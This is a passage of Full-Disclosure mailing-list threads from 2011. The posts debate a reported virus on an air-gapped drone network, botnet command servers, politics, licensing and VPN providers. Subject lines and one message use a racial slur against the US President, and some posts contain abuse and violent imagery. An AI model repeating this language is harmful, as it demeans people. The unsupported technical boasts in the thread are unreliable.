Uhm, how do you know? As much as I think it unlikely, they might have actually analyzed the executable and found it doesn't do that sort of thing. On Tue, Oct 11, 2011 at 1:45 AM, Bob Dobbs bobd10...@gmail.com wrote: On Mon, Oct 10, 2011 at 4:31 PM, Michael Schmidt mschm...@drugstore.com wrote: If it's bot net code and it is behind an air barrier then it will never phone home. They It already broke the air wall to get in. It can certainly do so to get out. Bob
Re: [Full-disclosure] Wipe off, rub out, reappear...
If you ask me, you sound like bragging on something you wrote. Either that, or you're clueless to what you are saying. Just because my younger brother won't understand 5 lines of code I wrote doesn't make my 5 liner smart... Applying the analogy here, just because they're possibly clueless to how OS internals work doesn't mean the virus is doing anything particularly smart. On Tue, Oct 11, 2011 at 1:55 AM, xD 0x41 sec...@gmail.com wrote: Is obvious, this is a very well made executable :) Or, set up well to spread and then hide, and doing so with even its phone home, which is normal nowadays, for example consider an ircd, it uses PING/PONG, what if you change the rfc, and use ascii characters, then do this to the bot, remove USER mode completely only allow it for set modes/opers, and then try take the thing down, if it is connected thru about 40 different ips and does not rely on dynamic dns... it is not impossible, it is happening now, and, it is also visible, however, these c&c centres are so advanced, IDS are just not getting enough info...you cannot do a thing on the properly modified control centres, and, i have seen that code, it is extremely modified version of ircd... it cannot be used by a non operator, and uses a totally different rfc to phone home etc, thus making conventional methods used atm, useless... as they will look for the strings that they know, and always IDS will perform some string of commands, and, then slowly the operator sees the servers, and one by one he blocks YOU out of his network. This is a dog eat dog world, bot masters can be exceptionally ingenious when it comes to these things, and masking an exe nowadays, is not as simple as some people's SFX rar kits :) So even kits nowadays, can be way more advanced than 2008/2009 even... there has been a burst of tech, so there is also a burst in virus numbers... but, smart cc centres, you won't take down so easily, and they will move before you can even decrypt their settings... which is exactly why stuxnet is non stoppable.. unless the owner shuts it down, it won't be killed.. xd On 11 October 2011 10:45, Bob Dobbs bobd10...@gmail.com wrote: On Mon, Oct 10, 2011 at 4:31 PM, Michael Schmidt mschm...@drugstore.com wrote: If it's bot net code and it is behind an air barrier then it will never phone home. They It already broke the air wall to get in. It can certainly do so to get out. Bob
Re: [Full-disclosure] Wipe off, rub out, reappear...
I already beat you up to it - you know nothing about their setup. You don't know if their infection is the result of a botnet. I don't deny you know anything about botnets, I'm just saying from the looks of it you jumped to a load of conclusions without any proof whatsoever. On Tue, Oct 11, 2011 at 12:11 PM, xD 0x41 sec...@gmail.com wrote: screw it, i'm a bite, i know my shit here.. If i was not so smart, then i guess i would not have a modified ircd which is similar... wow i know.. just seems you don't know crap about cc botnets, that's fo sure. I think i outlined a *good* setup, as i have seen it, or would not bothered to state the mods made.. is that simple. whether it is hard to code or not, is not my business, nor i care for.. I just know, how they run, and, don't try bs me about what i do and don't know, because on this topic son, i have plenty of experience, and could easily match this with an AV spokesperson, and would not hesitate to, but what gains it to me? None. I am here for those who give a crap, you sir, know nothing, at all, about even the controlling side of a good botnet which, spreads fast. Most people, simply do not want you on them, then the better ones, simply hide as users on irc anyhow ;) Then again, i wouldn't know shit ey. gnite :-) have fun trying to pick apart anything with me in this area, i will enjoy tearing your anus out, word by word if i have to. xd On 11 October 2011 20:29, Christian Sciberras uuf6...@gmail.com wrote: If you ask me, you sound like bragging on something you wrote. Either that, or you're clueless to what you are saying. Just because my younger brother won't understand 5 lines of code I wrote doesn't make my 5 liner smart... Applying the analogy here, just because they're possibly clueless to how OS internals work doesn't mean the virus is doing anything particularly smart. On Tue, Oct 11, 2011 at 1:55 AM, xD 0x41 sec...@gmail.com wrote: Is obvious, this is a very well made executable :) Or, set up well to spread and then hide, and doing so with even its phone home, which is normal nowadays, for example consider an ircd, it uses PING/PONG, what if you change the rfc, and use ascii characters, then do this to the bot, remove USER mode completely only allow it for set modes/opers, and then try take the thing down, if it is connected thru about 40 different ips and does not rely on dynamic dns... it is not impossible, it is happening now, and, it is also visible, however, these c&c centres are so advanced, IDS are just not getting enough info...you cannot do a thing on the properly modified control centres, and, i have seen that code, it is extremely modified version of ircd... it cannot be used by a non operator, and uses a totally different rfc to phone home etc, thus making conventional methods used atm, useless... as they will look for the strings that they know, and always IDS will perform some string of commands, and, then slowly the operator sees the servers, and one by one he blocks YOU out of his network. This is a dog eat dog world, bot masters can be exceptionally ingenious when it comes to these things, and masking an exe nowadays, is not as simple as some people's SFX rar kits :) So even kits nowadays, can be way more advanced than 2008/2009 even... there has been a burst of tech, so there is also a burst in virus numbers... but, smart cc centres, you won't take down so easily, and they will move before you can even decrypt their settings... which is exactly why stuxnet is non stoppable.. unless the owner shuts it down, it won't be killed.. xd On 11 October 2011 10:45, Bob Dobbs bobd10...@gmail.com wrote: On Mon, Oct 10, 2011 at 4:31 PM, Michael Schmidt mschm...@drugstore.com wrote: If it's bot net code and it is behind an air barrier then it will never phone home. They It already broke the air wall to get in. It can certainly do so to get out. Bob
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
I'm confident in knowing that many would agree not to trust a single word of what you're saying. You might have touched the heart of many with the excuse of being poor, but you won't sell the lie that you're not well off because of a pure heart to anyone. On Tue, Oct 11, 2011 at 3:25 PM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Chris - Empathy, guilt, and morals. Guilt being a major factor. The possibility was always there to make millions via evil means, but morals and knowing it would be hard to live with. The problem is not getting lots of money. That is the easy part. The issue is with living with yourself afterward. On Tue, Oct 11, 2011 at 12:43 AM, Bob Dobbs bobd10...@gmail.com wrote: On Mon, Oct 10, 2011 at 10:57 AM, Jeffrey Walton noloa...@gmail.com wrote: Who are the real threats to the US: terrorists who try to dream up ways to do the US harm, or Corporate and Congress which does the US harm? I hate to contribute to an off-topic thread but you've successfully trolled me here: Congress has done FAR more harm to the US than terrorists over the last 10 years by just about every measure. Bob
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
He who believes the 99% are not guilty of greed is a downright fool. The 1%? I don't care. Honestly, I don't. Fun quote (from the 99% crowd): Why does the 1% deserve a Ferrari and I don't?! On Mon, Oct 10, 2011 at 10:43 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: The day may come when Wall Street is finally silent, the slowly rotting carcasses of the power hungry elites swinging silently from the trees in Central park, the lynch mob finally satiated... But will anything change? Greed will always exist, there will always be those who think they can get away with this kind of thing. Funny how it finally has the President interested, maybe we can have change now? On Thu, Oct 6, 2011 at 7:54 PM, Jeffrey Walton noloa...@gmail.com wrote: On Thu, Oct 6, 2011 at 1:21 PM, Georgi Guninski gunin...@guninski.com wrote: American people understand that not everybody's been following the rules, he said. These days, a lot of folks doing the right thing are not rewarded. A lot of folks who are not doing the right thing are rewarded. From the article: President Obama on Thursday called the Occupy Wall Street protests a reflection of a broad-based frustration about how our financial system works and pledged to continue fighting to protect American consumers. I seem to recall what Obama said at a banker's luncheon after he took office (to paraphrase): My administration is the only thing saving you from the pitchforks of the American people. It seems to me he took great pride in the protection he provided to the economic terrorists. I hope he chokes on the money the industry is stuffing in his pockets. Jeff
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
What's that got to do with everything? You can't go force everyone to wear thorn jeans just because you feel inferior when faced with a formal suit. That, as well as the fact that the guy that got $1M in his bank account rightly has what to brag about. If you just can't get over it, get that iPhone and buy an app for your problem (yes, there's an app for that!) :) On Mon, Oct 10, 2011 at 12:28 PM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: We all are guilty, that is true. I can admit to that. Though what I intensely dislike are those who think they are better than us - because they are more successful at being greedy pigs. On Mon, Oct 10, 2011 at 9:54 AM, Christian Sciberras uuf6...@gmail.com wrote: He who believes the 99% are not guilty of greed is a downright fool. The 1%? I don't care. Honestly, I don't. Fun quote (from the 99% crowd): Why does the 1% deserve a Ferrari and I don't?! On Mon, Oct 10, 2011 at 10:43 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: The day may come when Wall Street is finally silent, the slowly rotting carcasses of the power hungry elites swinging silently from the trees in Central park, the lynch mob finally satiated... But will anything change? Greed will always exist, there will always be those who think they can get away with this kind of thing. Funny how it finally has the President interested, maybe we can have change now? On Thu, Oct 6, 2011 at 7:54 PM, Jeffrey Walton noloa...@gmail.com wrote: On Thu, Oct 6, 2011 at 1:21 PM, Georgi Guninski gunin...@guninski.com wrote: American people understand that not everybody's been following the rules, he said. These days, a lot of folks doing the right thing are not rewarded. A lot of folks who are not doing the right thing are rewarded. From the article: President Obama on Thursday called the Occupy Wall Street protests a reflection of a broad-based frustration about how our financial system works and pledged to continue fighting to protect American consumers. I seem to recall what Obama said at a banker's luncheon after he took office (to paraphrase): My administration is the only thing saving you from the pitchforks of the American people. It seems to me he took great pride in the protection he provided to the economic terrorists. I hope he chokes on the money the industry is stuffing in his pockets. Jeff
[Full-disclosure] “We keep wiping it off, and it keeps coming back”
http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/ This is news to me. Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from? It sounds fishy if you ask me. Chris.
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
Yeah Darren, wish we all could get off like that $1M guy, screwing off hardworking people while doing nothing. That'd be the life. Wonder what's stopping us all from doing it? On Mon, Oct 10, 2011 at 3:41 PM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: iPhones... Why sir, surely you know a Nokia 3210 is far superior in conditions where it may be dropped? Sure, the guy with $1,000,000 can brag if he wants. Just if he has screwed over thousands of hardworking people to get that, and sees hisself as untouchable... Then he should suffer the consequences of his unsavory actions. On Mon, Oct 10, 2011 at 1:32 PM, Kain, Rebecca (.) bka...@ford.comwrote: Yes, why say anything that way??? -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God) Sent: Thursday, October 06, 2011 1:31 PM To: Georgi Guninski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules No offense intended??? How you expect to refer to the President of the United States as a nigger and NOT offend people? You crossed WAY over the line on that one, joro. WAY over. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski Sent: Thursday, October 06, 2011 10:22 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules risking n3td3v fate, sorry for offtopic. the nigger said [1] (no offense intended to black people): American people understand that not everybody's been following the rules, he said. These days, a lot of folks doing the right thing are not rewarded. A lot of folks who are not doing the right thing are rewarded. 
[1] http://www.cbsnews.com/8301-503544_162-20116707-503544.html -- joro
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
I'm talking more about their engineers than their network. If I had my network infected with a virus, I'd immediately deploy some form of logging/monitoring tool (eg, wireshark). Honestly, it all sounds like they're employing inexperienced engineers. Which is again strange, considering the field they're in. Regarding your bet, see that's already something. Why exactly can't they verify your bet? It isn't like viruses suddenly became invisible, is it? I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on. On Mon, Oct 10, 2011 at 3:40 PM, Michael T mt2410...@gmail.com wrote: It's a network that's 'detached', or 'segregated', or whatevered from the rest of the world, so it's 'largely immune to viruses'. That likely means they have: 1. NO logging 2. NO anti-virus 3. NO hardening The very fact that these systems are on a segregated network means they are probably more frail, and more susceptible to viruses, than a normal person's laptop. Immune to viruses... What a crock of shit. My bet is that it's coming from the planes. Mike On Mon, Oct 10, 2011 at 7:51 AM, Christian Sciberras uuf6...@gmail.com wrote: http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/ This is news to me. Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from? It sounds fishy if you ask me. Chris.
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
Since it very much discredits and puts the AA to shame, isn't it quite plausible that some department's lawyers fall over this guy's claims? Maybe the article has been written specifically for people to draw the wrong conclusion - happens too often - but still... On Mon, Oct 10, 2011 at 7:36 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: Consider the source. It’s “someone close” to the operations, and that only according to this guy. It could very well be a slot-puller in the casino across the street… I’m always dubious of the reporting of this type of thing where the source is some “secret” person, and where there is never any ability to refute claims. t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian Sciberras Sent: Monday, October 10, 2011 7:05 AM To: Michael T Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” I'm talking more about their engineers than their network. If I had my network infected with a virus, I'd immediately deploy some form of logging/monitoring tool (eg, wireshark). Honestly, it all sounds like they're employing inexperienced engineers. Which is again strange, considering the field they're in. Regarding your bet, see that's already something. Why exactly can't they verify your bet? It isn't like viruses suddenly became invisible, is it? I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on. On Mon, Oct 10, 2011 at 3:40 PM, Michael T mt2410...@gmail.com wrote: It's a network that's 'detached', or 'segregated', or whatevered from the rest of the world, so it's 'largely immune to viruses'. That likely means they have: 1. NO logging 2. NO anti-virus 3. NO hardening The very fact that these systems are on a segregated network means they are probably more frail, and more susceptible to viruses, than a normal person's laptop. Immune to viruses... What a crock of shit. My bet is that it's coming from the planes. Mike On Mon, Oct 10, 2011 at 7:51 AM, Christian Sciberras uuf6...@gmail.com wrote: http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/ This is news to me. Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from? It sounds fishy if you ask me. Chris.
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
That would make the joke of the year. No, REALLY. On Mon, Oct 10, 2011 at 6:08 PM, Dave m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 10/10/2011 15:01, Christian Sciberras wrote: Yeah Darren, wish we all could get off like that $1M guy, screwing off hardworking people while doing nothing. That'd be the life. Wonder what's stopping us all from doing it? A social conscience? Empathy? Do unto others...? All three of the above? I know that's why I'm not rich. On Mon, Oct 10, 2011 at 3:41 PM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: iPhones... Why sir, surely you know a Nokia 3210 is far superior in conditions where it may be dropped? Sure, the guy with $1,000,000 can brag if he wants. Just if he has screwed over thousands of hardworking people to get that, and sees hisself as untouchable... Then he should suffer the consequences of his unsavory actions. On Mon, Oct 10, 2011 at 1:32 PM, Kain, Rebecca (.) bka...@ford.com wrote: Yes, why say anything that way??? -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God) Sent: Thursday, October 06, 2011 1:31 PM To: Georgi Guninski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules No offense intended??? How you expect to refer to the President of the United States as a nigger and NOT offend people? You crossed WAY over the line on that one, joro. WAY over. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski Sent: Thursday, October 06, 2011 10:22 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules risking n3td3v fate, sorry for offtopic. 
the nigger said [1] (no offense intended to black people): American people understand that not everybody's been following the rules, he said. These days, a lot of folks doing the right thing are not rewarded. A lot of folks who are not doing the right thing are rewarded. [1] http://www.cbsnews.com/8301-503544_162-20116707-503544.html -- joro
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
Well, I know a local datacenter (can't be more than 10 years old) makes use of a Faraday cage around it. And it doesn't really keep any mission-critical equipment, so I guess others out there do the same. Depending on the type of cage/shielding (don't know about the local one) it can completely block communications... On Mon, Oct 10, 2011 at 10:17 PM, Michael Schmidt mschm...@drugstore.com wrote: I have no idea, I assume – this is usually what they mean when they talk about an “air barrier” From: evejou [mailto:g...@techn0ev3.net] Sent: Monday, October 10, 2011 1:04 PM To: Michael Schmidt Cc: Thor (Hammer of God); Christian Sciberras; Michael T; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” As someone kind of young (and thus no historical recollection), I'm kind of surprised that this is talked about in past-tense. Does this not happen anymore? I could see how this could get super annoying after awhile. On Mon, Oct 10, 2011 at 2:09 PM, Michael Schmidt mschm...@drugstore.com wrote: I know in the old days (15 years ago) – there were networks that were completely separate from the outside world. I remember trying to do telephone tech support to someone on a secure network… Tell him to do “this” He puts down the phone, goes through physical security, tries “this” He comes back though security picks up phone talks to me. Security allowed nothing that looked like portable storage in or out of the secure area. Rinse. Repeat. Couldn’t even place outside voice calls from the secure network area. I don’t know if they do this today. I also know that there used to be setups with removable hard drives where one drive connected you to the secure network and yet another drive connected to the unsecure network. – Two different network cards each enabled for different networks. The good old days From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of God) Sent: Monday, October 10, 2011 10:36 AM To: Christian Sciberras; Michael T Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” Consider the source. It’s “someone close” to the operations, and that only according to this guy. It could very well be a slot-puller in the casino across the street… I’m always dubious of the reporting of this type of thing where the source is some “secret” person, and where there is never any ability to refute claims. t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian Sciberras Sent: Monday, October 10, 2011 7:05 AM To: Michael T Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” I'm talking more about their engineers than their network. If I had my network infected with a virus, I'd immediately deploy some form of logging/monitoring tool (eg, wireshark). Honestly, it all sounds like they're employing inexperienced engineers. Which is again strange, considering the field they're in. Regarding your bet, see that's already something. Why exactly can't they verify your bet? It isn't like viruses suddenly became invisible, is it? I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on. On Mon, Oct 10, 2011 at 3:40 PM, Michael T mt2410...@gmail.com wrote: It's a network that's 'detached', or 'segregated', or whatevered from the rest of the world, so it's 'largely immune to viruses'. That likely means they have: 1. NO logging 2. NO anti-virus 3. NO hardening The very fact that these systems are on a segregated network means they are probably more frail, and more susceptible to viruses, than a normal person's laptop. Immune to viruses... What a crock of shit. My bet is that it's coming from the planes. Mike On Mon, Oct 10, 2011 at 7:51 AM, Christian Sciberras uuf6...@gmail.com wrote: http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/ This is news to me. Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from? It sounds fishy if you ask me. Chris.
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
By the way, to reply to a certain n3td3v... locating anything does not imply being clueless on what's going on, which seems to be their on-going issue. While at it, a reply to Thor, just to switch subjects for a bit; shield law doesn't apply when a journalist/reporter falsifies information to get low against the AA (in this case). Since the judge and the prosecuted are one and the same (the AA), I think it is a considerably dangerous situation to go against them. That's the only notch of credibility I'm giving to the article. A response from the AA could easily crush that trust. Cheers, Chris.
On Mon, Oct 10, 2011 at 10:24 PM, Christian Sciberras uuf6...@gmail.com wrote: Well, I know a local datacenter (can't be more than 10 years old) makes use of a Faraday cage around it. And it doesn't really keep any mission-critical equipment, so I guess others out there do the same. Depending on the type of cage/shielding (don't know about the local one) it can completely block communications...
On Mon, Oct 10, 2011 at 10:17 PM, Michael Schmidt mschm...@drugstore.com wrote: I have no idea, I assume – this is usually what they mean when they talk about an “air barrier”
*From:* evejou [mailto:g...@techn0ev3.net] *Sent:* Monday, October 10, 2011 1:04 PM *To:* Michael Schmidt *Cc:* Thor (Hammer of God); Christian Sciberras; Michael T; full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
As someone kind of young (and thus no historical recollection), I'm kind of surprised that this is talked about in past-tense. Does this not happen anymore? I could see how this could get super annoying after awhile.
On Mon, Oct 10, 2011 at 2:09 PM, Michael Schmidt mschm...@drugstore.com wrote: I know in the old days (15 years ago) – there were networks that were completely separate from the outside world. I remember trying to do telephone tech support to someone on a secure network… Tell him to do “this” He puts down the phone, goes through physical security, tries “this” He comes back through security picks up phone talks to me. Security allowed nothing that looked like portable storage in or out of the secure area. Rinse. Repeat. Couldn’t even place outside voice calls from the secure network area. I don’t know if they do this today. I also know that there used to be setups with removable hard drives where one drive connected you to the secure network and yet another drive connected to the unsecure network. – Two different network cards each enabled for different networks. The good old days
*From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Thor (Hammer of God) *Sent:* Monday, October 10, 2011 10:36 AM *To:* Christian Sciberras; Michael T *Cc:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
Consider the source. It’s “someone close” to the operations, and that only according to this guy. It could very well be a slot-puller in the casino across the street… I’m always dubious of the reporting of this type of thing where the source is some “secret” person, and where there is never any ability to refute claims.
t
*From:* full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Christian Sciberras *Sent:* Monday, October 10, 2011 7:05 AM *To:* Michael T *Cc:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
I'm talking more about their engineers than their network. If I had my network infected with a virus, I'd immediately deploy some form of logging/monitoring tool (eg, wireshark). Honestly, it all sounds like they're employing inexperienced engineers. Which is again strange, considering the field they're in. Regarding your bet, see that's already something. Why exactly can't they verify your bet? It isn't like viruses suddenly became invisible, is it? I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on.
On Mon, Oct 10, 2011 at 3:40 PM, Michael T mt2410...@gmail.com wrote: It's a network that's 'detached', or 'segregated', or whatevered from the rest of the world, so it's 'largely immune to viruses'. That likely means they have:
1. NO logging
2. NO anti-virus
3. NO hardening
The very fact that these systems are on a segregated network means they are probably more frail, and more susceptible to viruses, than a normal person's laptop. Immune to viruses... What a crock of shit. My bet
Re: [Full-disclosure] Wipe off, rub out, reappear...
Well, it SHOULDN'T happen to people that are supposedly trained to overcome such issues. It's like engineers are inexperienced prior to a nuclear reactor meltdown. While I wouldn't expect the engineers to have first-hand experience in dealing with such issues, it still doesn't excuse them from knowing what they're doing.
On Mon, Oct 10, 2011 at 10:22 PM, Daniel Sichel dani...@ponderosatel.com wrote: Somebody posted the following; I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on. Doesn't sound funny to me, happens to me all the time. That's how I learn. Dan S.
___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
I'd expect someone with the brain size of a pea would at least rename variables in the code he claimed as his... Someone with more sense would probably write such a 50-liner from scratch...
On Thu, Oct 6, 2011 at 4:01 PM, valdis.kletni...@vt.edu wrote: On Thu, 06 Oct 2011 00:34:00 -0300, root said: You don't have the faintest idea of how licencing works. You cannot slap a GPL v3 license to any software you see, much less erase the author's names. If you find a code in the internet without any license, you pretty much can't touch it, and must re-implement it completely.
In particular, if code was written in a country that's a signatory to the Berne conventions, it's usually somewhere between very difficult and impossible to actually place a software work in the public domain - at least under US law, even putting an explicit This work is hereby placed in the public domain quite likely does *NOT* suffice - the only two clear ways to public domain in the US are expiration of the lifetime of the author plus 75 years copyright, and works for hire by a US federal government employee as part of his duties (so, for instance, NASA photographs are public domain - but photos of NASA activities taken by non-NASA photographers probably aren't).
Also, smart programmers *don't* release their code into the public domain - that means that anybody can do anything with it. And that includes stealing it, using it to make tons of money, and then suing you if they discover a bug. The original reason for the BSD and X11 licenses was because you can't stick a hold harmless clause on something you public-domain.
Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure
But you're certainly growing it. Retard. On Thu, Oct 6, 2011 at 10:45 PM, xD 0x41 sec...@gmail.com wrote: umm.. idid not start this thread, nor many of the ones your actually replying to... have you even noticed this. fool. On 7 October 2011 07:04, Antony widmal antony.wid...@gmail.com wrote: Thing is, you bring shit, stupidity, troll on this mailing list. Most people here would agree. How about you start another shit/off-topic thread about Israel vs Palestinian this time ? Could be a fucking great topic on a IT sec mailing list. On Thu, Oct 6, 2011 at 3:53 PM, xD 0x41 sec...@gmail.com wrote: Oh, the brilliant one with nothing to offer... again. This list is getting worse, with or w/out me.. it only needs u and n3td3v and is perfect. yung. I make, i think, abit more than the avg McDonalds manager... so , you can dreamup your sick fantasies but, unfortunately the truth is truth. ciao bella. xd On 7 October 2011 06:44, Antony widmal antony.wid...@gmail.com wrote: Didn't know you could flip burgers and use your smartphone while working at Mc-Donald. On Thu, Oct 6, 2011 at 3:24 PM, xD 0x41 sec...@gmail.com wrote: “, the Indians were somewhat persecuted :) “ By that I take it you mean, systematic genocide? Where I grew up the school mascot (high school) was Benjamin Logan, an in(?)-famous Indian killer who not only murdered Indians, he wiped out entire villages massacring men, women and children in most of the villages in the area to eliminate the “native threat” for the white settlers. hehe i really dont know, and really, dont care... it is always some new and different views, so i just know from my school classes, indians were indeed hunted, and they also, fought back.. abit like aboriginals here.. 
but, this guy i think was high on ice or sumthin before he even spoke to me, he assumes i am now a racist :s I was saying, this country here in .au , is prolly the least one i could think of, as we have maybe 5 races alone in my street, maybe more, how could you fight your neighbor... abit like some countries ;) (iran/iraq , serbia/bosnia)...just gotup one day because told to, and took up arms, literally, against theyre neighbors... Thats happening now, and it is still called genocide.. That is life'... I aint young enough to join the army and make any difference. anyhow, i aint really into this race talk, and, dont want nothin todo with it, am no racist, simply not brought up to think badly of other people... this could happen, anywhere.. cheers xd On 7 October 2011 06:19, Csirt, Star s...@delta.com wrote: ** ** ** “, the Indians were somewhat persecuted :) “ ** ** By that I take it you mean, systematic genocide? Where I grew up the school mascot (high school) was Benjamin Logan, an in(?)-famous Indian killer who not only murdered Indians, he wiped out entire villages massacring men, women and children in most of the villages in the area to eliminate the “native threat” for the white settlers. ** ** ** ** ** ** -- *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *xD 0x41 *Sent:* Thursday, October 06, 2011 3:14 PM *To:* Sam Goody *Cc:* **full-disclosure@lists.grok.org.uk** *Subject:* Re: [Full-disclosure] OT Nigger - georgi+guninski+nigger+full-disclosure ** ** Do you know any history about the racism that the native Indians have experienced? haha yes yes they would be named Aboriginals, in USA , the Indians were somewhat persecuted :) get YOUR head out of YOUR arse idiot. xd On 7 October 2011 06:09, Sam Goody trashm...@hush.com wrote: You should really jump off a bridge. You always talk out of your ass including this one. How do you know there isn't racism in AU? How you ever been there? 
Do you know any history about the racism that the native Indians have experienced? Do you know about all other cultures that have had to endure racist laws in the AU? You have got no clue you piece of shit. Why don't you fucking get your head out of your ass. And what do you know about gangs? Are you now a gang expert? So gangs now inspire racism? Do you even know what racism means? You're a fucking failure you American piece of Shit.
Re: [Full-disclosure] VPN providers and any providers in general...
In my eyes, a couple of offtopic messages is ok, but a train of several messages in less than an hour is what spam is... I must admit I was pissed off at that time, and the fact that some people failed to deal with such discussions appropriately only made it worse. Next time, launch your own thread for such discussions, so that people can easily manage/ignore what they don't need, instead of filling up legitimate threads with crap (imho).
On Tue, Oct 4, 2011 at 11:27 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Ok, well I suppose we can avoid spamming the list with our off topic ramblings and get back to the topic on hand (and behave like adults, which I assume all of you'se are), and clear up a few things up. VPN's and such can serve as a method to stop people on the local network from sniffing your connection (assuming a reliable encryption scheme is in place, and you have not been MITM-ed during the key exchange or whatever - crypto is NOT my interest!). However, we can reliably assume that the VPN provider can sniff your connection and compromise your safety per se, and that they WILL cooperate with Law Enforcement. Even running your own VPN (OpenVPN) on a VPS you purchase is still risky, as the VPS provider can simply take over the box. Etc. TL;DR, VPN's are not as safe as some believe for protecting one's anonymity. They WILL roll over for LEO and such. Not to mention threats on the LAN could compromise you, but I do not know much about how that works on the crypto side (however, if someone wants to enlighten me I would be grateful, it has piqued my curiosity!) Also, NOT surprised the provider rolled over in THAT case.
*footnote for Christian, etc. I apologise for inciting a bit of off topic ranting, merely discussing morals, and how they affect people, and how often people do silly things when their logic/morality is compromised, often by narcotics and such. But that is for a discussion on morals and the psychology/sociology of cybercriminals. The ensuing debate about psychedelics and coding was probably my fault, but hey, people have varied interests, no? If we are going to act our age (adults, I presume) on this list at least display some tolerance for other people's discussions, and keep the anger off the list.
On Tue, Oct 4, 2011 at 8:06 AM, Ferenc Kovacs tyr...@gmail.com wrote: http://vpn.hidemyass.com/vpncontrol/legal.html
VPN Data
What we store: Time stamp and IP address when you connect and disconnect to our service.
...
Legalities
Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities.
people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent.
On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote: maybe they are law abiding companies? :)
Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... which is half the reason i believe the people use those ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-paradise vpn service. xd
